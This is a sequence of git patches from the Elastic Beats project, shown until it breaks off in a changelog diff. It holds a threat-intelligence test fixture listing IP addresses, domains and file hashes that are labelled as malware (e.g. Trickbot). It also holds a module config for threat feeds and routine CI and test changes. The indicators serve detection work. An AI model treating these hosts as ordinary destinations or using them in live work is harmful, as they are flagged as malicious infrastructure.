"event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5352, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "0d73f1a1c4b2f8723fffc83eb3d00f31", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 29ff1903832827e328ad9ec05fdf268eadd6db8b613597cf65f8740c211be413", + "threatintel.otx.title": "vad_contains_network_strings" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5579, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "185.25.50.167", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5684, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "d35a30264c0698709ad554489004e0077e263d354ced0c54552a0b500f91ecc0", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 5851, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "5264b455f453820be629a324196131492ff03c80491e823ac06657c9387250dd", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6018, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trojan:Win32/Occamy.B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6204, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6386, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "b8e463789a076b16a90d1aae73cea9d3880ac0ead1fd16587b8cd79e37a1a3d8", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6553, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6735, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 6917, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "c51024bb119211c335f95e731cfa9a744fcdb645a57d35fb379d01b7dbdd098e", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7084, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "ad20c6fac565f901c82a21b70f9739037eb54818", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 9b86a50b36aea5cc4cb60573a3660cf799a9ec1f69a3d4572d3dc277361a0ad2", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7310, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "13f11e273f9a4a56557f03821c3bfd591cca6ebc", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 3012f472969327d5f8c9dac63b8ea9c5cb0de002d16c120a6bba4685120f58b4", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7536, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "1581fe76e3c96dc33182daafd09c8cf5c17004e0", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 113af75f13547be184822f1268f984b79f35965a1b1f963d23b50a09741b0aec", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7762, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "b72e75e9e901a44b655a5cf89cf0eadcaff46037", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "SHA1 of 1455091954ecf9ccd6fe60cb8e982d9cfb4b3dc8414443ccfdfc444079829d56", + "threatintel.otx.title": "Trojan:Win32/Occamy.B" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 7992, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "maper.info", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8096, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "213.252.244.126", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8203, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "78.129.139.131", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8309, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8498, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "be9fb556a3c7aef0329e768d7f903e7dd42a821abc663e11fb637ce33b007087", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8687, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "3bfec096c4837d1e6485fe0ae0ea6f1c0b44edc611d4f2204cc9cf73c985cbc2", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 8876, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "dff2e39b2e008ea89a3d6b36dcd9b8c927fb501d60c1ad5a52ed1ffe225da2e2", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9065, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "6b4d271a48d118843aee3dee4481fa2930732ed7075db3241a8991418f00d92b", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9254, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "26de4265303491bed1424d85b263481ac153c2b3513f9ee48ffb42c12312ac43", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9443, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "02f54da6c6f2f87ff7b713d46e058dedac1cedabd693643bb7f6dfe994b2105d", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "xor_0x20_xord_javascript" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9632, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "103.13.67.4", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9735, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "80.90.87.201", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9839, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "80.80.163.182", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 9944, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "91.187.114.210", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10050, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "170.238.117.187", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10157, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha256": "e999b83629355ec7ff3b6fda465ef53ce6992c9327344fbf124f7eb37808389d", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10324, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "103.84.238.3", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10428, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "179.43.158.171", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10534, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "198.211.116.199", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10641, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "203.176.135.102", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trickbot" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10754, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "fotmailz.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10860, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "pori89g5jqo3v8.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 10972, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "sebco.co.ke", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11077, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "177.74.232.124", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trickbot" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11189, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "chishir.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11294, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "kostunivo.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11401, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "mangoclone.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11509, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.domain": "onixcellent.com", + "threatintel.indicator.type": "domain-name", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11618, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "fc0efd612ad528795472e99cae5944b68b8e26dc", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11774, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "24d4bbc982a6a561f0426a683b9617de1a96a74a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Sf:ShellCode-DZ\\ [Trj]" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 11936, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "fa98074dc18ad7e2d357b5d168c00a91256d87d1", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12092, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.sha1": "e5dc7c8bfa285b61dda1618f0ade9c256be75d1a", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.title": "Win64:Malware-gen" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12248, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "96.9.77.142", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "", + "threatintel.otx.title": "Trickbot" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12357, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "36.89.106.69", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12461, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.ip": "96.9.73.73", + "threatintel.indicator.type": "ipv4-addr", + "threatintel.otx.content": "" + }, + { + "event.category": "threat", + "event.dataset": "threatintel.otx", + "event.kind": "enrichment", + "event.module": "threatintel", + "event.type": "indicator", + "fileset.name": "otx", + "input.type": "log", + "log.offset": 12563, + "service.type": "threatintel", + "tags": [ + "threatintel-otx", + "forwarded" + ], + "threatintel.indicator.file.hash.md5": "10ec3571596c30b9993b89f12d29d23c", + "threatintel.indicator.type": "file", + "threatintel.otx.content": "", + "threatintel.otx.description": "MD5 of 9af8a93519d22ed04ffb9ccf6861c9df1b77dc5d22e0aeaff4a582dbf8660ba6", + "threatintel.otx.title": "xor_0x20_xord_javascript" + } +] \ No newline at end of file diff --git a/x-pack/filebeat/modules.d/threatintel.yml.disabled b/x-pack/filebeat/modules.d/threatintel.yml.disabled new file mode 100644 index 000000000000..3e03fee654f7 --- /dev/null +++ b/x-pack/filebeat/modules.d/threatintel.yml.disabled @@ -0,0 +1,97 @@ +# Module: threatintel +# Docs: https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-threatintel.html + +- module: threatintel + abuseurl: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/urls/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + abusemalware: + enabled: true + + # Input used for ingesting threat intel data. + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://urlhaus-api.abuse.ch/v1/payloads/recent/ + + # The interval to poll the API for updates. + var.interval: 60m + + misp: + enabled: true + + # Input used for ingesting threat intel data, defaults to JSON. + var.input: httpjson + + # The URL of the MISP instance, should end with "/events/restSearch". + var.url: https://SERVER/events/restSearch + + # The authentication token used to contact the MISP API. Found when looking at user account in the MISP UI. + var.api_token: API_KEY + + # Optional filters that can be applied to the API for filtering out results. This should support the majority of fields in a MISP context. + # For examples please reference the filebeat module documentation. + #var.filters: + # - threat_level: [4, 5] + # - to_ids: true + + # How far back to look once the beat starts up for the first time, the value has to be in hours. Each request afterwards will filter on any event newer + # than the last event that was already ingested. + var.first_interval: 24h + + # The interval to poll the API for updates. + var.interval: 60m + + otx: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for OTX Threat Intel API calls. + var.url: https://otx.alienvault.com/api/v1/indicators/export + + # The authentication token used to contact the OTX API, can be found on the OTX UI. + var.api_token: API_KEY + + # Optional filters that can be applied to retrieve only specific indicators. + #var.types: "domain,IPv4,hostname,url,FileHash-SHA256" + + # How many hours to look back for each request, should be close to the configured interval. Deduplication of events is handled by the module. + var.lookback_range: 2h + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m + + anomali: + enabled: true + + # Input used for ingesting threat intel data + var.input: httpjson + + # The URL used for Threat Intel API calls. + var.url: https://limo.anomali.com/api/v1/taxii2/feeds/collections/41/objects + + # The Username used by anomali Limo, defaults to guest. + #var.username: guest + + # The password used by anomali Limo, defaults to guest. + #var.password: guest + + # How far back to look once the beat starts up for the first time, the value has to be in hours. + var.first_interval: 24h + + # The interval to poll the API for updates + var.interval: 60m From b5796ed1762163fa4e533d31ae6c26dfd0bbb4b8 Mon Sep 17 00:00:00 2001 From: Elastic Machine Date: Mon, 15 Feb 2021 09:44:11 -0500 Subject: [PATCH 40/63] backport: remove 7.10 branch (#23987) * chore: add-backport-next * Update .backportrc.json Co-authored-by: Ivan Fernandez Calvo --- .backportrc.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/.backportrc.json b/.backportrc.json index ef4e81dc5802..51dc238ee78e 100644 --- a/.backportrc.json +++ b/.backportrc.json @@ -1,6 +1,6 @@ { "upstream": "elastic/beats", - "branches": [ { "name": "7.x", "checked": true }, "7.11", "7.10" ], + "branches": [ { "name": "7.x", "checked": true }, "7.11" ], "labels": ["backport"], "autoAssign": true, "prTitle": "Cherry-pick to {targetBranch}: {commitMessages}" From ee0d74a9f4622904eef399269b22e1604bf30c09 Mon Sep 17 00:00:00 2001 From: Victor Martinez Date: Mon, 15 Feb 2021 15:06:02 +0000 Subject: [PATCH 41/63] [CI] docker login for linux only (#24030) --- Jenkinsfile | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/Jenkinsfile b/Jenkinsfile index 8f309602c3f2..3cee434b6e68 100644 --- a/Jenkinsfile +++ b/Jenkinsfile @@ -877,12 +877,14 @@ def dumpVariables(){ } def isDockerInstalled(){ + if (env?.NODE_LABELS?.toLowerCase().contains('macosx')) { + log(level: 'WARN', text: "Macosx workers require some docker-machine context. They are not used for anything related to docker stuff yet.") + return false + } if (isUnix()) { - // TODO: some issues with macosx if(isInstalled(tool: 'docker', flag: '--version')) { return sh(label: 'check for Docker', script: 'command -v docker', returnStatus: true) == 0 - } else { - return false } + return false } /** From 768a2492ba01396c4d60b34ba83479f45bef184f Mon Sep 17 00:00:00 2001 From: Steffen Siering Date: Mon, 15 Feb 2021 16:34:23 +0100 Subject: [PATCH 42/63] Syslog system tests: be more forgiving (#24021) --- filebeat/tests/system/test_syslog.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/filebeat/tests/system/test_syslog.py b/filebeat/tests/system/test_syslog.py index a535bdf970f9..be4a600f7143 100644 --- a/filebeat/tests/system/test_syslog.py +++ b/filebeat/tests/system/test_syslog.py @@ -254,7 +254,7 @@ def assert_syslog(self, syslog, has_address=True): assert syslog["event.severity"] == 5 assert syslog["hostname"] == "wopr.mymachine.co" assert syslog["input.type"] == "syslog" - assert syslog["message"] == "'su root' failed for lonvick on /dev/pts/8 0" + assert syslog["message"].startswith("'su root' failed for lonvick on /dev/pts/8") assert syslog["process.pid"] == 2000 assert syslog["process.program"] == "postfix/smtpd" assert syslog["syslog.facility"] == 1 From 9dbfd44594c94fd759a05a507ce1d04e67d6d7b6 Mon Sep 17 00:00:00 2001 From: Marius Iversen Date: Mon, 15 Feb 2021 16:51:12 +0100 Subject: [PATCH 43/63] [Filebeat] Check if processor is supported by ES version (#23763) * adding possibility to remove processor if its unsupported * removing unused function while testing * was initially testing with a separate function, removed that for now * moving it to its own function * rewriting SetProcessors logic to be more extendable * added testcases for uri parts * stashing changes * Fix assert.NoError usages These should have been require.NoError otherwise panics occur. * Package cleanup Errors should not begin with capitals. Avoid double logging errors (both logging and returning them). Fix usage of deprecated logp functions. Remove unused code (ML module). Removed unneeded import alias. Avoid allocating empty slices. Add missing error check for config Unpack. * Add changelog Co-authored-by: Andrew Kroh --- CHANGELOG.next.asciidoc | 2 + filebeat/fileset/compatibility.go | 224 +++++++ filebeat/fileset/compatibility_test.go | 643 +++++++++++++++++++ filebeat/fileset/config_test.go | 3 +- filebeat/fileset/factory.go | 18 +- filebeat/fileset/fileset_test.go | 55 +- filebeat/fileset/modules.go | 63 +- filebeat/fileset/modules_integration_test.go | 43 +- filebeat/fileset/modules_test.go | 78 +-- filebeat/fileset/pipelines.go | 194 +----- filebeat/fileset/pipelines_test.go | 500 +------------- filebeat/fileset/setup.go | 9 +- 12 files changed, 1026 insertions(+), 806 deletions(-) create mode 100644 filebeat/fileset/compatibility.go create mode 100644 filebeat/fileset/compatibility_test.go diff --git a/CHANGELOG.next.asciidoc b/CHANGELOG.next.asciidoc index 21ce698db828..1759d22c0282 100644 --- a/CHANGELOG.next.asciidoc +++ b/CHANGELOG.next.asciidoc @@ 